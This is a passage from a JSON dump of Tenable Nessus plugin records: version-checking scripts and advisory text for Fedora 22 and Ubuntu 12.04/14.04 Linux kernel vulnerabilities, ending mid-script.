Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 22 : kernel-4.3.4-200.fc22 (2016-5d43766e33)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4312", "CVE-2015-7513", "CVE-2015-7566", "CVE-2015-8569", "CVE-2015-8575", "CVE-2015-8709", "CVE-2015-8767", "CVE-2015-8787", "CVE-2016-0723", "CVE-2016-0728"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2016-5D43766E33.NASL", "href": "https://www.tenable.com/plugins/nessus/89554", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2016-5d43766e33.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89554);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2013-4312\", \"CVE-2015-7513\", \"CVE-2015-7566\", \"CVE-2015-8569\", \"CVE-2015-8575\", \"CVE-2015-8709\", \"CVE-2015-8767\", \"CVE-2015-8787\", \"CVE-2016-0723\", \"CVE-2016-0728\");\n script_xref(name:\"FEDORA\", value:\"2016-5d43766e33\");\n\n script_name(english:\"Fedora 22 : kernel-4.3.4-200.fc22 (2016-5d43766e33)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest upstream stable release, Linux v4.3.4. Elan touchpad\nfixes. ---- Update to 4.3.y stable series. Fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1284847\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1292045\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1292840\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1295287\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1296253\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1296466\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1297389\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1297475\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1297813\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1300731\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2016-February/176484.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?44a7add4\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/12/28\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"kernel-4.3.4-200.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-16T14:51:58", "description": "Ben Hawkes discovered that the Linux netfilter implementation did not correctly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-3134)\n\nIt was discovered that the Linux kernel did not properly enforce rlimits for file descriptors sent over UNIX domain sockets. A local attacker could use this to cause a denial of service. (CVE-2013-4312)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux kernel did not properly sanity check the interfaces and endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7833)\n\nIt was discovered that a race condition existed in the ioctl handler for the TTY driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or expose sensitive information. (CVE-2016-0723)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly performed a double-free. A local attacker with physical access could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework did not verify that a FIFO was attached to a client before attempting to clear it. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-2543)\n\nDmitry Vyukov discovered that a race condition existed in the Advanced Linux Sound Architecture (ALSA) framework between timer setup and closing of the client, resulting in a use-after-free. A local attacker could use this to cause a denial of service. (CVE-2016-2544)\n\nDmitry Vyukov discovered a race condition in the timer handling implementation of the Advanced Linux Sound Architecture (ALSA) framework, resulting in a use-after-free. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-2545)\n\nDmitry Vyukov discovered race conditions in the Advanced Linux Sound Architecture (ALSA) framework's timer ioctls leading to a use-after-free. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2016-2546)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework's handling of high resolution timers did not properly manage its data structures. A local attacker could use this to cause a denial of service (system hang or crash) or possibly execute arbitrary code. (CVE-2016-2547, CVE-2016-2548)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework's handling of high resolution timers could lead to a deadlock condition. A local attacker could use this to cause a denial of service (system hang). (CVE-2016-2549)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS : linux-lts-trusty vulnerabilities (USN-2929-2)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4312", "CVE-2015-7566", "CVE-2015-7833", "CVE-2016-0723", "CVE-2016-2384", "CVE-2016-2543", "CVE-2016-2544", "CVE-2016-2545", "CVE-2016-2546", "CVE-2016-2547", "CVE-2016-2548", "CVE-2016-2549", "CVE-2016-2782", "CVE-2016-3134"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2929-2.NASL", "href": "https://www.tenable.com/plugins/nessus/89933", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2929-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89933);\n script_version(\"2.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2013-4312\", \"CVE-2015-7566\", \"CVE-2015-7833\", \"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\", \"CVE-2016-3134\");\n script_xref(name:\"USN\", value:\"2929-2\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-trusty vulnerabilities (USN-2929-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Hawkes discovered that the Linux netfilter implementation did not\ncorrectly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges. (CVE-2016-3134)\n\nIt was discovered that the Linux kernel did not properly enforce\nrlimits for file descriptors sent over UNIX domain sockets. A local\nattacker could use this to cause a denial of service. (CVE-2013-4312)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux\nkernel did not properly sanity check the interfaces and endpoints\nreported by the device. An attacker with physical access could cause a\ndenial of service (system crash). (CVE-2015-7833)\n\nIt was discovered that a race condition existed in the ioctl handler\nfor the TTY driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or expose sensitive\ninformation. (CVE-2016-0723)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\nperformed a double-free. A local attacker with physical access could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework did not verify that a FIFO was attached to a client\nbefore attempting to clear it. A local attacker could use this to\ncause a denial of service (system crash). (CVE-2016-2543)\n\nDmitry Vyukov discovered that a race condition existed in the Advanced\nLinux Sound Architecture (ALSA) framework between timer setup and\nclosing of the client, resulting in a use-after-free. A local attacker\ncould use this to cause a denial of service. (CVE-2016-2544)\n\nDmitry Vyukov discovered a race condition in the timer handling\nimplementation of the Advanced Linux Sound Architecture (ALSA)\nframework, resulting in a use-after-free. A local attacker could use\nthis to cause a denial of service (system crash). (CVE-2016-2545)\n\nDmitry Vyukov discovered race conditions in the Advanced Linux Sound\nArchitecture (ALSA) framework's timer ioctls leading to a\nuse-after-free. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2016-2546)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework's handling of high resolution timers did not properly\nmanage its data structures. A local attacker could use this to cause a\ndenial of service (system hang or crash) or possibly execute arbitrary\ncode. (CVE-2016-2547, CVE-2016-2548)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework's handling of high resolution timers could lead to a\ndeadlock condition. A local attacker could use this to cause a denial\nof service (system hang). (CVE-2016-2549)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2929-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic and / or\nlinux-image-3.13-generic-lpae packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2013-4312\", \"CVE-2015-7566\", \"CVE-2015-7833\", \"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\", \"CVE-2016-3134\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2929-2\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-83-generic\", pkgver:\"3.13.0-83.127~precise1\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.13.0-83-generic-lpae\", pkgver:\"3.13.0-83.127~precise1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.13-generic / linux-image-3.13-generic-lpae\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-09-16T14:50:49", "description": "Ben Hawkes discovered that the Linux netfilter implementation did not correctly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-3134)\n\nIt was discovered that the Linux kernel did not properly enforce rlimits for file descriptors sent over UNIX domain sockets. A local attacker could use this to cause a denial of service. (CVE-2013-4312)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux kernel did not properly sanity check the interfaces and endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2015-7833)\n\nIt was discovered that a race condition existed in the ioctl handler for the TTY driver in the Linux kernel. A local attacker could use this to cause a denial of service (system crash) or expose sensitive information. (CVE-2016-0723)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly performed a double-free. A local attacker with physical access could use this to cause a denial of service (system crash) or possibly execute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework did not verify that a FIFO was attached to a client before attempting to clear it. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-2543)\n\nDmitry Vyukov discovered that a race condition existed in the Advanced Linux Sound Architecture (ALSA) framework between timer setup and closing of the client, resulting in a use-after-free. A local attacker could use this to cause a denial of service. (CVE-2016-2544)\n\nDmitry Vyukov discovered a race condition in the timer handling implementation of the Advanced Linux Sound Architecture (ALSA) framework, resulting in a use-after-free. A local attacker could use this to cause a denial of service (system crash). (CVE-2016-2545)\n\nDmitry Vyukov discovered race conditions in the Advanced Linux Sound Architecture (ALSA) framework's timer ioctls leading to a use-after-free. A local attacker could use this to cause a denial of service (system crash) or possibly execute arbitrary code.\n(CVE-2016-2546)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework's handling of high resolution timers did not properly manage its data structures. A local attacker could use this to cause a denial of service (system hang or crash) or possibly execute arbitrary code. (CVE-2016-2547, CVE-2016-2548)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture (ALSA) framework's handling of high resolution timers could lead to a deadlock condition. A local attacker could use this to cause a denial of service (system hang). (CVE-2016-2549)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the Linux kernel did not properly sanity check the endpoints reported by the device. An attacker with physical access could cause a denial of service (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-15T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux vulnerabilities (USN-2929-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-4312", "CVE-2015-7566", "CVE-2015-7833", "CVE-2016-0723", "CVE-2016-2384", "CVE-2016-2543", "CVE-2016-2544", "CVE-2016-2545", "CVE-2016-2546", "CVE-2016-2547", "CVE-2016-2548", "CVE-2016-2549", "CVE-2016-2782", "CVE-2016-3134"], "modified": "2023-01-17T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-2929-1.NASL", "href": "https://www.tenable.com/plugins/nessus/89932", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2929-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89932);\n script_version(\"2.20\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2013-4312\", \"CVE-2015-7566\", \"CVE-2015-7833\", \"CVE-2016-0723\", \"CVE-2016-2384\", \"CVE-2016-2543\", \"CVE-2016-2544\", \"CVE-2016-2545\", \"CVE-2016-2546\", \"CVE-2016-2547\", \"CVE-2016-2548\", \"CVE-2016-2549\", \"CVE-2016-2782\", \"CVE-2016-3134\");\n script_xref(name:\"USN\", value:\"2929-1\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux vulnerabilities (USN-2929-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Ben Hawkes discovered that the Linux netfilter implementation did not\ncorrectly perform validation when handling IPT_SO_SET_REPLACE events.\nA local unprivileged attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges. (CVE-2016-3134)\n\nIt was discovered that the Linux kernel did not properly enforce\nrlimits for file descriptors sent over UNIX domain sockets. A local\nattacker could use this to cause a denial of service. (CVE-2013-4312)\n\nRalf Spenneberg discovered that the USB driver for Clie devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2015-7566)\n\nRalf Spenneberg discovered that the usbvision driver in the Linux\nkernel did not properly sanity check the interfaces and endpoints\nreported by the device. An attacker with physical access could cause a\ndenial of service (system crash). (CVE-2015-7833)\n\nIt was discovered that a race condition existed in the ioctl handler\nfor the TTY driver in the Linux kernel. A local attacker could use\nthis to cause a denial of service (system crash) or expose sensitive\ninformation. (CVE-2016-0723)\n\nAndrey Konovalov discovered that the ALSA USB MIDI driver incorrectly\nperformed a double-free. A local attacker with physical access could\nuse this to cause a denial of service (system crash) or possibly\nexecute arbitrary code with administrative privileges. (CVE-2016-2384)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework did not verify that a FIFO was attached to a client\nbefore attempting to clear it. A local attacker could use this to\ncause a denial of service (system crash). (CVE-2016-2543)\n\nDmitry Vyukov discovered that a race condition existed in the Advanced\nLinux Sound Architecture (ALSA) framework between timer setup and\nclosing of the client, resulting in a use-after-free. A local attacker\ncould use this to cause a denial of service. (CVE-2016-2544)\n\nDmitry Vyukov discovered a race condition in the timer handling\nimplementation of the Advanced Linux Sound Architecture (ALSA)\nframework, resulting in a use-after-free. A local attacker could use\nthis to cause a denial of service (system crash). (CVE-2016-2545)\n\nDmitry Vyukov discovered race conditions in the Advanced Linux Sound\nArchitecture (ALSA) framework's timer ioctls leading to a\nuse-after-free. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code.\n(CVE-2016-2546)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework's handling of high resolution timers did not properly\nmanage its data structures. A local attacker could use this to cause a\ndenial of service (system hang or crash) or possibly execute arbitrary\ncode. (CVE-2016-2547, CVE-2016-2548)\n\nDmitry Vyukov discovered that the Advanced Linux Sound Architecture\n(ALSA) framework's handling of high resolution timers could lead to a\ndeadlock condition. A local attacker could use this to cause a denial\nof service (system hang). (CVE-2016-2549)\n\nRalf Spenneberg discovered that the USB driver for Treo devices in the\nLinux kernel did not properly sanity check the endpoints reported by\nthe device. An attacker with physical access could cause a denial of\nservice (system crash). (CVE-2016-2782).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2929-1/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic,\nlinux-image-3.13-generic-lpae and / or linux-image-3.13-lowlatency\npackages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/10/19\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/03/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = 